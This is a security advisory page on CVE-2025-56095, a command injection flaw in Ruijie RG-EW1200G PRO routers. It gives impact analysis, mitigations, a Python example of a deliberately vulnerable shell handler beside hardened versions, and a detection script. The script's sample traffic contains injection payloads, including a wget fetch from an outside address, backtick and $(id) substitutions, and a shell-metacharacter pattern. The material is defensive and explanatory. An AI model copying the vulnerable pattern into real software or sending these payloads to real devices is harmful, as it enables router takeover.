CVE-2025-56095: n/a
OS Command Injection vulnerability in Ruijie RG-EW1200G PRO RG-EW1200G PRO V1.00/V2.00/V3.00/V4.00 allowing attackers to execute arbitrary commands via a crafted POST request to the module_set in file /usr/local/lua/dev_sta/nbr_cwmp.lua.
AI Analysis
Technical Summary
CVE-2025-56095 is an OS command injection flaw (CWE-78, Improper Neutralization of Special Elements used in an OS Command) in Ruijie RG-EW1200G PRO firmware V1.00 through V4.00. The bug sits in the module_set handler of the Lua script /usr/local/lua/dev_sta/nbr_cwmp.lua, which services a POST request on the device's web interface. Input from that request reaches an operating-system command without being neutralized, so a request body carrying shell metacharacters makes the device run attacker-chosen commands. The script's name suggests it belongs to the router's CWMP (TR-069) remote-management code, which is why it performs device-configuration actions at all. The CVE record does not publish the parameter name or the HTTP route.

The CVE record itself carries no CVSS vector (the Technical Details below list the CVSS version as null); the score used in this analysis is 8.8, corresponding to the CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, which is a High rating rather than Critical. The PR:L component matters in practice: the attacker first needs credentials for the web interface, so default or weak admin passwords, credential reuse and management interfaces reachable from untrusted networks are what make this remotely exploitable. No user interaction is required. Injected commands run with the privileges of the web server process, which on embedded routers is commonly root, so a successful injection is effectively full device compromise: persistence on the device, interception or redirection of the traffic it routes, and a pivot into the network behind it.

No public exploit and no vendor patch were known at the time of disclosure. The RG-EW1200G PRO is a SOHO-class wireless router, so exposure is most likely at small offices, branch sites and home-office endpoints rather than in enterprise network cores.
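The pattern behind CWE-78 as described above, shown as an added example in Python rather than the firmware's Lua (the real nbr_cwmp.lua handler is not public and is not reproduced here; the parameter name and the echo command standing in for the device's real system command are assumptions). The vulnerable form concatenates the request value into a command line and hands it to /bin/sh; the two hardened forms validate against an allowlist and either avoid the shell entirely or, where a shell cannot be avoided, quote the value. The second fallback is the one that applies to Lua, because os.execute() and io.popen() always invoke the shell and have no argv-style interface.

```python
"""CWE-78 illustration: a handler that splices a POST parameter into a shell command,
next to two hardened forms. Example code, not the Ruijie firmware."""
import re
import shlex
import subprocess

# Allowlist for a hypothetical "module name" value such as module_set might read from
# a POST body. The real parameter name is not published in the CVE record.
MODULE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_valid_module_name(module_name: str) -> bool:
    """Strict allowlist: letters, digits, '_', '.', '-' only, at most 32 characters."""
    return MODULE_NAME_RE.fullmatch(module_name) is not None


def vulnerable_module_set(module_name: str) -> str:
    """Vulnerable: attacker input is concatenated into a command line and parsed by
    /bin/sh, so ';', '|', '&', backticks and $(...) introduce new commands.
    Lua's os.execute()/io.popen() behave like shell=True here."""
    cmd = "echo loading module " + module_name   # 'echo' stands in for the real command
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_module_set(module_name: str) -> str:
    """Hardened: reject anything outside the allowlist, then run the program with an
    argv list so no shell ever parses the value."""
    if not is_valid_module_name(module_name):
        raise ValueError("module name rejected: %r" % module_name)
    proc = subprocess.run(["echo", "loading module", module_name],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def quoted_module_set(module_name: str) -> str:
    """Fallback when the shell cannot be avoided (the Lua situation): shell-quote the
    value so metacharacters become literal text. Allowlist validation should still
    run first; quoting alone does not stop over-long or unexpected values."""
    cmd = "echo loading module " + shlex.quote(module_name)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "wifi; echo INJECTED"   # ';' terminates the intended command; a second one follows
    print(repr(vulnerable_module_set(payload)))   # second command ran
    print(repr(quoted_module_set(payload)))       # payload echoed back as literal text
    print(is_valid_module_name(payload))          # False: rejected before any command runs
    print(repr(hardened_module_set("wifi")))      # normal value still works
```

Run on a host with /bin/sh. The point to take from the vulnerable function is that no specific character is the problem: anything the shell treats as syntax (command separators, pipes, substitution) works, which is why blocking a list of bad characters is weaker than allowlisting the characters a module name may legitimately contain.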
Potential Impact
For European organizations the practical exposure follows from where these routers sit: a compromised edge router is a foothold on the LAN it serves and a vantage point for intercepting or redirecting that LAN's traffic. Command execution as the firmware's web process lets an attacker install malware or a persistent backdoor, alter DNS and routing, read credentials and configuration stored on the device, and move laterally to hosts behind it. Because the flaw requires authentication, the at-risk population is devices whose management interface is reachable from untrusted networks, including units a service provider manages over CWMP/TR-069, combined with default, weak or reused admin credentials. With no patch available, that window stays open until Ruijie ships fixed firmware. Organizations subject to GDPR and NIS2 face notification obligations if a compromised router exposes personal data or affects an essential service. The RG-EW1200G PRO is a SOHO-class device, so it is most likely found at small businesses, branch offices and remote-worker sites; the operational impact there is loss of connectivity and exposure of whatever traffic and hosts the router fronts, rather than a direct hit on data-centre infrastructure.
Mitigation Recommendations
1. Take the web management interface off the internet and out of reach of guest and general-user segments; allow admin access only from a management VLAN or over a VPN. If the unit is managed over TR-069, confirm the remote-management exposure is limited to the provider's ACS.
2. Because exploitation needs valid credentials (PR:L), change default admin passwords, use unique ones per device, and remove accounts nobody uses. Review device logs for repeated failed logins, which on an exposed interface point to credential stuffing ahead of exploitation.
3. Monitor for POST requests to the module_set handler whose parameters carry shell metacharacters (;, |, &, backticks, $()). Plain web-server access logs do not record POST bodies, so this needs a proxy, IDS or packet capture with body visibility and, for HTTPS management, TLS termination you control.
4. Watch the router's own outbound behaviour: connections to unfamiliar hosts, downloads with wget or curl, and changes to DNS or routing configuration are the usual first signs of post-exploitation on this class of device.
5. Engage Ruijie support for fixed firmware, deploy it as soon as it is available, and verify the running version afterwards.
6. If the firmware offers a way to disable the affected remote-management function, use it as an interim measure; otherwise rely on the network controls in items 1 and 2.
7. Keep logging and alerting on device management activity, and ship logs off the device, since a compromised router can erase its own.
8. Load IPS signatures for this vulnerability once vendors publish them, and include these routers in regular vulnerability scans and inventory checks so exposed units are found before an attacker finds them.
9. Treat any unit that has been internet-exposed with default or weak credentials as potentially compromised: inspect its configuration, DNS settings and startup scripts, and factory-reset and reflash it if there is any doubt.
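The monitoring in the list above, as an added example that is not part of the page's analysis: a detection pass over captured HTTP requests that flags POSTs aimed at module_set whose parameters contain shell metacharacters. The sample capture is constructed, the URL path in it is hypothetical (the advisory names the Lua file, not the HTTP route), and the assumption that the request names module_set in a parameter is likewise an assumption; the only_module_set switch broadens the check to every POST in the capture for deployments where the route is unknown.

```python
"""Detection over captured HTTP requests to a router's web interface: flag POSTs aimed
at module_set whose parameter values contain shell metacharacters. Example code; the
sample capture below is constructed and its paths are assumptions."""
import json
import re
from urllib.parse import parse_qsl

# Characters and forms that let a value break out of a shell command line. A bare
# '(' is too noisy on its own, so only substitution forms are matched.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(|\$\{")

# Constructed sample capture, as a proxy or IDS with body visibility might log it.
SAMPLE_REQUESTS = [
    {"src": "10.10.1.20", "method": "POST", "path": "/cgi-bin/luci/api/nbr_cwmp",
     "body": "cmd=module_set&name=wifi"},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi-bin/luci/api/nbr_cwmp",
     "body": "cmd=module_set&name=wifi%3Bwget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx"},
    {"src": "198.51.100.7", "method": "POST", "path": "/cgi-bin/luci/api/nbr_cwmp",
     "body": '{"cmd": "module_set", "name": "wifi`id`"}'},
    {"src": "10.10.1.20", "method": "GET", "path": "/cgi-bin/luci/api/status", "body": ""},
    {"src": "10.10.1.21", "method": "POST", "path": "/cgi-bin/luci/api/nbr_cwmp",
     "body": "cmd=module_get&name=$(id)"},
]


def extract_params(body: str) -> dict:
    """Decode a form-encoded or JSON POST body into a flat {name: value} dict of strings.
    Percent-encoding is decoded here, so %3B is seen as ';'."""
    body = body.strip()
    if body.startswith("{"):
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        return {str(k): str(v) for k, v in data.items()}
    return dict(parse_qsl(body, keep_blank_values=True))


def targets_module_set(req: dict, params: dict) -> bool:
    """True when the request names module_set in its path or in any parameter value."""
    return "module_set" in req["path"] or "module_set" in params.values()


def detect(requests: list, only_module_set: bool = True) -> list:
    """One finding per suspicious request: a POST (aimed at module_set unless
    only_module_set is False) with a parameter value containing a shell metacharacter."""
    findings = []
    for req in requests:
        if req["method"] != "POST":
            continue
        params = extract_params(req["body"])
        if only_module_set and not targets_module_set(req, params):
            continue
        for name, value in params.items():
            match = SHELL_META.search(value)
            if match:
                findings.append({"src": req["src"], "path": req["path"], "param": name,
                                 "token": match.group(0), "value": value})
                break   # one finding per request is enough for alerting
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_REQUESTS):
        print(finding)
    print("broad scan:", len(detect(SAMPLE_REQUESTS, only_module_set=False)), "findings")
```

Two findings come out of the default run (the percent-encoded wget chain and the JSON body with backticks); the broad scan adds the $(id) sent to module_get, which is worth an alert even though it does not name the vulnerable handler. Decoding before matching is the important step: an IDS that pattern-matches the raw body will miss %3B.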
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-08-16T00:00:00.000Z
- CVSS Version: null (the CVE record publishes no CVSS vector; the 8.8 score in the analysis above is the analysis's own estimate)
- State: PUBLISHED
Threat ID: 693b0c4c7d4c6f31f7befcd6
Added to database: 12/11/2025, 6:24:12 PM
Last enriched: 12/19/2025, 5:30:31 AM
Last updated: 2/4/2026, 7:42:06 AM
Views: 37